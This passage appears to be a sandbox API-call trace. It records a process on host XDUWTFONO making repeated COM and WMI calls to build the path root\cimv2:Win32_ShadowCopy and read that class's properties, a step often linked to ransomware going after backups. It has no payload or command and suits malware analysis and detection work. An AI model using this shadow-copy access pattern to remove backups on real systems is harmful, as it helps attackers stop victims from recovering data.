ppvObject=0x1c64be30*=0x0) returned 0x80004002 [0109.494] WbemDefPath:IUnknown:AddRef (This=0x1c8f50d0) returned 0x3 [0109.494] CoGetContextToken (in: pToken=0x1c64ba80 | out: pToken=0x1c64ba80) returned 0x0 [0109.494] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f50d0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ba40 | out: ppvObject=0x1c64ba40*=0x1b796d40) returned 0x0 [0109.494] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b796d40, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64ba70 | out: pCid=0x1c64ba70*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.494] WbemDefPath:IUnknown:Release (This=0x1b796d40) returned 0x3 [0109.494] CoGetContextToken (in: pToken=0x1c64ba50 | out: pToken=0x1c64ba50) returned 0x0 [0109.494] WbemDefPath:IUnknown:AddRef (This=0x1c8f50d0) returned 0x4 [0109.494] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f50d0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bb68 | out: ppvObject=0x1c64bb68*=0x0) returned 0x80004002 [0109.494] WbemDefPath:IUnknown:Release (This=0x1c8f50d0) returned 0x3 [0109.494] WbemDefPath:IUnknown:Release (This=0x1c8f50d0) returned 0x2 [0109.494] WbemDefPath:IUnknown:Release (This=0x1c8f1940) returned 0x0 [0109.495] WbemDefPath:IUnknown:Release (This=0x1c8f50d0) returned 0x1 [0109.495] CoGetContextToken (in: pToken=0x1c64c780 | out: pToken=0x1c64c780) returned 0x0 [0109.495] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0109.495] WbemDefPath:IUnknown:AddRef (This=0x1c8f50d0) returned 0x2 [0109.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f50d0, riid=0x1c64c800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c7e0 | out: ppvObject=0x1c64c7e0*=0x1c8f50d0) returned 0x0 [0109.495] WbemDefPath:IUnknown:Release (This=0x1c8f50d0) returned 0x2 [0109.495] WbemDefPath:IUnknown:Release (This=0x1c8f50d0) returned 0x1 [0109.495] CoGetContextToken (in: pToken=0x1c64c900 | out: pToken=0x1c64c900) returned 0x0 [0109.495] CoGetContextToken (in: pToken=0x1c64c840 | out: pToken=0x1c64c840) returned 0x0 [0109.495] WbemDefPath:IUnknown:AddRef (This=0x1c8f50d0) returned 0x2 [0109.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f50d0, riid=0x1c64c980*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c960 | out: ppvObject=0x1c64c960*=0x1c8f50d0) returned 0x0 [0109.495] WbemDefPath:IUnknown:Release (This=0x1c8f50d0) returned 0x2 [0109.495] WbemDefPath:IUnknown:AddRef (This=0x1c8f50d0) returned 0x3 [0109.495] WbemDefPath:IWbemPath:SetText (This=0x1c8f50d0, uMode=0x4, pszPath="root\\cimv2") returned 0x0 [0109.496] WbemDefPath:IUnknown:Release (This=0x1c8f50d0) returned 0x2 [0109.496] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f4fd0, puCount=0x1c64cc20 | out: puCount=0x1c64cc20*=0x0) returned 0x0 [0109.496] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f50d0, puCount=0x1c64cc20 | out: puCount=0x1c64cc20*=0x2) returned 0x0 [0109.496] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f50d0, lFlags=16, puBuffLength=0x1c64cc20*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cc20*=0xb, pszText=0x0) returned 0x0 [0109.496] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f50d0, lFlags=16, puBuffLength=0x1c64cc20*=0xb, pszText="0000000000" | out: puBuffLength=0x1c64cc20*=0xb, pszText="root\\cimv2") returned 0x0 [0109.496] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x1c8f4fd0) returned 0x0 [0109.496] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f50d0, puCount=0x1c64cc80 | out: puCount=0x1c64cc80*=0x2) returned 0x0 [0109.497] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f50d0, uIndex=0x0, puNameBufLength=0x1c64cc80*=0x0, pName=0x0 | out: puNameBufLength=0x1c64cc80*=0x5, pName=0x0) returned 0x0 [0109.497] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f50d0, uIndex=0x0, puNameBufLength=0x1c64cc80*=0x5, pName="0000" | out: puNameBufLength=0x1c64cc80*=0x5, pName="root") returned 0x0 [0109.497] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1c8f4fd0, uIndex=0x0, pszName="root") returned 0x0 [0109.497] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f50d0, uIndex=0x1, puNameBufLength=0x1c64cc80*=0x0, pName=0x0 | out: puNameBufLength=0x1c64cc80*=0x6, pName=0x0) returned 0x0 [0109.497] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f50d0, uIndex=0x1, puNameBufLength=0x1c64cc80*=0x6, pName="00000" | out: puNameBufLength=0x1c64cc80*=0x6, pName="cimv2") returned 0x0 [0109.497] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1c8f4fd0, uIndex=0x1, pszName="cimv2") returned 0x0 [0109.497] WbemDefPath:IWbemPath:GetClassName (in: This=0x1c8f4fd0, puBuffLength=0x1c64ccc0*=0x0, pszName=0x0 | out: puBuffLength=0x1c64ccc0*=0x0, pszName=0x0) returned 0x8004103a [0109.497] WbemDefPath:IWbemPath:SetClassName (This=0x1c8f4fd0, Name="Win32_ShadowCopy") returned 0x0 [0109.499] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f4fd0, puCount=0x1c64cd10 | out: puCount=0x1c64cd10*=0x2) returned 0x0 [0109.499] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f4fd0, lFlags=4, puBuffLength=0x1c64cd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cd10*=0x28, pszText=0x0) returned 0x0 [0109.500] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f4fd0, lFlags=4, puBuffLength=0x1c64cd10*=0x28, pszText="000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cd10*=0x28, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy") returned 0x0 [0109.501] WbemDefPath:IWbemPath:GetInfo (in: This=0x1c8f4fd0, uRequestedInfo=0x0, puResponse=0x1c64cd30 | out: puResponse=0x1c64cd30*=0x20c16) returned 0x0 [0109.501] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f4fd0, puCount=0x1c64cd10 | out: puCount=0x1c64cd10*=0x2) returned 0x0 [0109.501] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f4fd0, lFlags=8, puBuffLength=0x1c64cd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cd10*=0x17, pszText=0x0) returned 0x0 [0109.501] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f4fd0, lFlags=8, puBuffLength=0x1c64cd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cd10*=0x17, pszText="\\\\XDUWTFONO\\root\\cimv2") returned 0x0 [0109.501] WbemDefPath:IWbemPath:GetInfo (in: This=0x1c8f4fd0, uRequestedInfo=0x0, puResponse=0x1c64cd30 | out: puResponse=0x1c64cd30*=0x20c16) returned 0x0 [0109.501] CoGetObjectContext (in: riid=0x1c64cba8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cba0 | out: ppv=0x1c64cba0*=0x212498) returned 0x0 [0109.501] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cbc0 | out: pAptType=0x1c64cbc0*=1) returned 0x0 [0109.501] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64ccc8 | out: ppvObject=0x1c64ccc8*=0x0) returned 0x80004002 [0109.501] IUnknown:Release (This=0x212498) returned 0x1 [0109.502] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c230 | out: ppv=0x1c64c230*=0x1c8f1a60) returned 0x0 [0109.502] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1a60, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64bf40 | out: ppvObject=0x1c64bf40*=0x0) returned 0x80004002 [0109.502] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1a60, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bf28 | out: ppvObject=0x1c64bf28*=0x1c8f53a0) returned 0x0 [0109.502] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f53a0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64be30 | out: ppvObject=0x1c64be30*=0x1c8f53a0) returned 0x0 [0109.502] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f53a0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64beb0 | out: ppvObject=0x1c64beb0*=0x0) returned 0x80004002 [0109.503] WbemDefPath:IUnknown:AddRef (This=0x1c8f53a0) returned 0x3 [0109.503] CoGetContextToken (in: pToken=0x1c64bb00 | out: pToken=0x1c64bb00) returned 0x0 [0109.503] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f53a0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bac0 | out: ppvObject=0x1c64bac0*=0x1b796ec0) returned 0x0 [0109.503] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b796ec0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64baf0 | out: pCid=0x1c64baf0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.503] WbemDefPath:IUnknown:Release (This=0x1b796ec0) returned 0x3 [0109.503] CoGetContextToken (in: pToken=0x1c64bad0 | out: pToken=0x1c64bad0) returned 0x0 [0109.503] WbemDefPath:IUnknown:AddRef (This=0x1c8f53a0) returned 0x4 [0109.503] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f53a0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bbe8 | out: ppvObject=0x1c64bbe8*=0x0) returned 0x80004002 [0109.503] WbemDefPath:IUnknown:Release (This=0x1c8f53a0) returned 0x3 [0109.503] WbemDefPath:IUnknown:Release (This=0x1c8f53a0) returned 0x2 [0109.503] WbemDefPath:IUnknown:Release (This=0x1c8f1a60) returned 0x0 [0109.504] WbemDefPath:IUnknown:Release (This=0x1c8f53a0) returned 0x1 [0109.504] CoGetContextToken (in: pToken=0x1c64c800 | out: pToken=0x1c64c800) returned 0x0 [0109.504] CoGetContextToken (in: pToken=0x1c64c740 | out: pToken=0x1c64c740) returned 0x0 [0109.504] WbemDefPath:IUnknown:AddRef (This=0x1c8f53a0) returned 0x2 [0109.504] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f53a0, riid=0x1c64c880*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c860 | out: ppvObject=0x1c64c860*=0x1c8f53a0) returned 0x0 [0109.504] WbemDefPath:IUnknown:Release (This=0x1c8f53a0) returned 0x2 [0109.504] WbemDefPath:IUnknown:Release (This=0x1c8f53a0) returned 0x1 [0109.504] CoGetContextToken (in: pToken=0x1c64c980 | out: pToken=0x1c64c980) returned 0x0 [0109.504] CoGetContextToken (in: pToken=0x1c64c8c0 | out: pToken=0x1c64c8c0) returned 0x0 [0109.504] WbemDefPath:IUnknown:AddRef (This=0x1c8f53a0) returned 0x2 [0109.504] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f53a0, riid=0x1c64ca00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c9e0 | out: ppvObject=0x1c64c9e0*=0x1c8f53a0) returned 0x0 [0109.504] WbemDefPath:IUnknown:Release (This=0x1c8f53a0) returned 0x2 [0109.504] WbemDefPath:IUnknown:AddRef (This=0x1c8f53a0) returned 0x3 [0109.505] WbemDefPath:IWbemPath:SetText (This=0x1c8f53a0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2") returned 0x0 [0109.505] WbemDefPath:IUnknown:Release (This=0x1c8f53a0) returned 0x2 [0109.505] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f53a0, puCount=0x1c64cc80 | out: puCount=0x1c64cc80*=0x2) returned 0x0 [0109.505] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f53a0, lFlags=4, puBuffLength=0x1c64cc80*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cc80*=0x17, pszText=0x0) returned 0x0 [0109.505] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f53a0, lFlags=4, puBuffLength=0x1c64cc80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cc80*=0x17, pszText="\\\\XDUWTFONO\\root\\cimv2") returned 0x0 [0109.507] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cc90 | out: puCount=0x1c64cc90*=0x2) returned 0x0 [0109.507] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cc90*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cc90*=0x17, pszText=0x0) returned 0x0 [0109.507] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cc90*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cc90*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0109.510] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cc40 | out: puCount=0x1c64cc40*=0x2) returned 0x0 [0109.510] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cc40*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cc40*=0x17, pszText=0x0) returned 0x0 [0109.510] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cc40*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cc40*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0109.510] CoGetContextToken (in: pToken=0x1c64ca20 | out: pToken=0x1c64ca20) returned 0x0 [0109.510] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0109.510] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c5f0 | out: ppvObject=0x1c64c5f0*=0x1b797ce0) returned 0x0 [0109.510] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0109.519] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0109.519] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f4fd0, lFlags=2, puBuffLength=0x1c64cc50*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cc50*=0x11, pszText=0x0) returned 0x0 [0109.519] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f4fd0, lFlags=2, puBuffLength=0x1c64cc50*=0x11, pszText="0000000000000000" | out: puBuffLength=0x1c64cc50*=0x11, pszText="Win32_ShadowCopy") returned 0x0 [0109.525] IWbemServices:GetObject (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppObject=0x1c64cbf8*=0x0, ppCallResult=0x0 | out: ppObject=0x1c64cbf8*=0x1c8f5460, ppCallResult=0x0) returned 0x0 [0109.539] IWbemClassObject:Get (in: This=0x1c8f5460, wszName="__PATH", lFlags=0, pVal=0x1c64cbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cbcc*=0, plFlavor=0x1c64cbc8*=0 | out: pVal=0x1c64cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ShadowCopy", varVal2=0x0), pType=0x1c64cbcc*=8, plFlavor=0x1c64cbc8*=64) returned 0x0 [0109.539] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ShadowCopy") returned 0x27 [0109.539] CoGetObjectContext (in: riid=0x1c64cb18*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cb10 | out: ppv=0x1c64cb10*=0x212498) returned 0x0 [0109.539] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cb30 | out: pAptType=0x1c64cb30*=1) returned 0x0 [0109.539] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64cc38 | out: ppvObject=0x1c64cc38*=0x0) returned 0x80004002 [0109.539] IUnknown:Release (This=0x212498) returned 0x1 [0109.540] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c1a0 | out: ppv=0x1c64c1a0*=0x1c8f1b00) returned 0x0 [0109.541] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1b00, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64beb0 | out: ppvObject=0x1c64beb0*=0x0) returned 0x80004002 [0109.541] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1b00, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64be98 | out: ppvObject=0x1c64be98*=0x1c8f57d0) returned 0x0 [0109.541] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f57d0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bda0 | out: ppvObject=0x1c64bda0*=0x1c8f57d0) returned 0x0 [0109.541] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f57d0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64be20 | out: ppvObject=0x1c64be20*=0x0) returned 0x80004002 [0109.541] WbemDefPath:IUnknown:AddRef (This=0x1c8f57d0) returned 0x3 [0109.541] CoGetContextToken (in: pToken=0x1c64ba70 | out: pToken=0x1c64ba70) returned 0x0 [0109.541] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f57d0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ba30 | out: ppvObject=0x1c64ba30*=0x1b796f60) returned 0x0 [0109.542] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b796f60, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64ba60 | out: pCid=0x1c64ba60*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.542] WbemDefPath:IUnknown:Release (This=0x1b796f60) returned 0x3 [0109.542] CoGetContextToken (in: pToken=0x1c64ba40 | out: pToken=0x1c64ba40) returned 0x0 [0109.542] WbemDefPath:IUnknown:AddRef (This=0x1c8f57d0) returned 0x4 [0109.542] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f57d0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bb58 | out: ppvObject=0x1c64bb58*=0x0) returned 0x80004002 [0109.542] WbemDefPath:IUnknown:Release (This=0x1c8f57d0) returned 0x3 [0109.542] WbemDefPath:IUnknown:Release (This=0x1c8f57d0) returned 0x2 [0109.542] WbemDefPath:IUnknown:Release (This=0x1c8f1b00) returned 0x0 [0109.542] WbemDefPath:IUnknown:Release (This=0x1c8f57d0) returned 0x1 [0109.542] CoGetContextToken (in: pToken=0x1c64c770 | out: pToken=0x1c64c770) returned 0x0 [0109.542] CoGetContextToken (in: pToken=0x1c64c6b0 | out: pToken=0x1c64c6b0) returned 0x0 [0109.542] WbemDefPath:IUnknown:AddRef (This=0x1c8f57d0) returned 0x2 [0109.542] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f57d0, riid=0x1c64c7f0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c7d0 | out: ppvObject=0x1c64c7d0*=0x1c8f57d0) returned 0x0 [0109.542] WbemDefPath:IUnknown:Release (This=0x1c8f57d0) returned 0x2 [0109.542] WbemDefPath:IUnknown:Release (This=0x1c8f57d0) returned 0x1 [0109.542] CoGetContextToken (in: pToken=0x1c64c8f0 | out: pToken=0x1c64c8f0) returned 0x0 [0109.543] CoGetContextToken (in: pToken=0x1c64c830 | out: pToken=0x1c64c830) returned 0x0 [0109.543] WbemDefPath:IUnknown:AddRef (This=0x1c8f57d0) returned 0x2 [0109.543] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f57d0, riid=0x1c64c970*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1c8f57d0) returned 0x0 [0109.543] WbemDefPath:IUnknown:Release (This=0x1c8f57d0) returned 0x2 [0109.543] WbemDefPath:IUnknown:AddRef (This=0x1c8f57d0) returned 0x3 [0109.543] WbemDefPath:IWbemPath:SetText (This=0x1c8f57d0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ShadowCopy") returned 0x0 [0109.543] WbemDefPath:IUnknown:Release (This=0x1c8f57d0) returned 0x2 [0109.543] IWbemClassObject:Get (in: This=0x1c8f5460, wszName="__SERVER", lFlags=0, pVal=0x1c64cc40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cc3c*=0, plFlavor=0x1c64cc38*=0 | out: pVal=0x1c64cc40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c64cc3c*=8, plFlavor=0x1c64cc38*=64) returned 0x0 [0109.543] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0109.543] IWbemClassObject:Get (in: This=0x1c8f5460, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64cc40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cc3c*=8, plFlavor=0x1c64cc38*=64 | out: pVal=0x1c64cc40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c64cc3c*=8, plFlavor=0x1c64cc38*=64) returned 0x0 [0109.543] SysStringLen (param_1="ROOT\\cimv2") returned 0xa [0109.543] IWbemClassObject:Get (in: This=0x1c8f5460, wszName="__CLASS", lFlags=0, pVal=0x1c64cc40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cc3c*=8, plFlavor=0x1c64cc38*=64 | out: pVal=0x1c64cc40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64cc3c*=8, plFlavor=0x1c64cc38*=64) returned 0x0 [0109.543] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0109.543] CoGetObjectContext (in: riid=0x1c64cae8*(Data1=0x1ce, Data2=0x0, Data3=0x0, 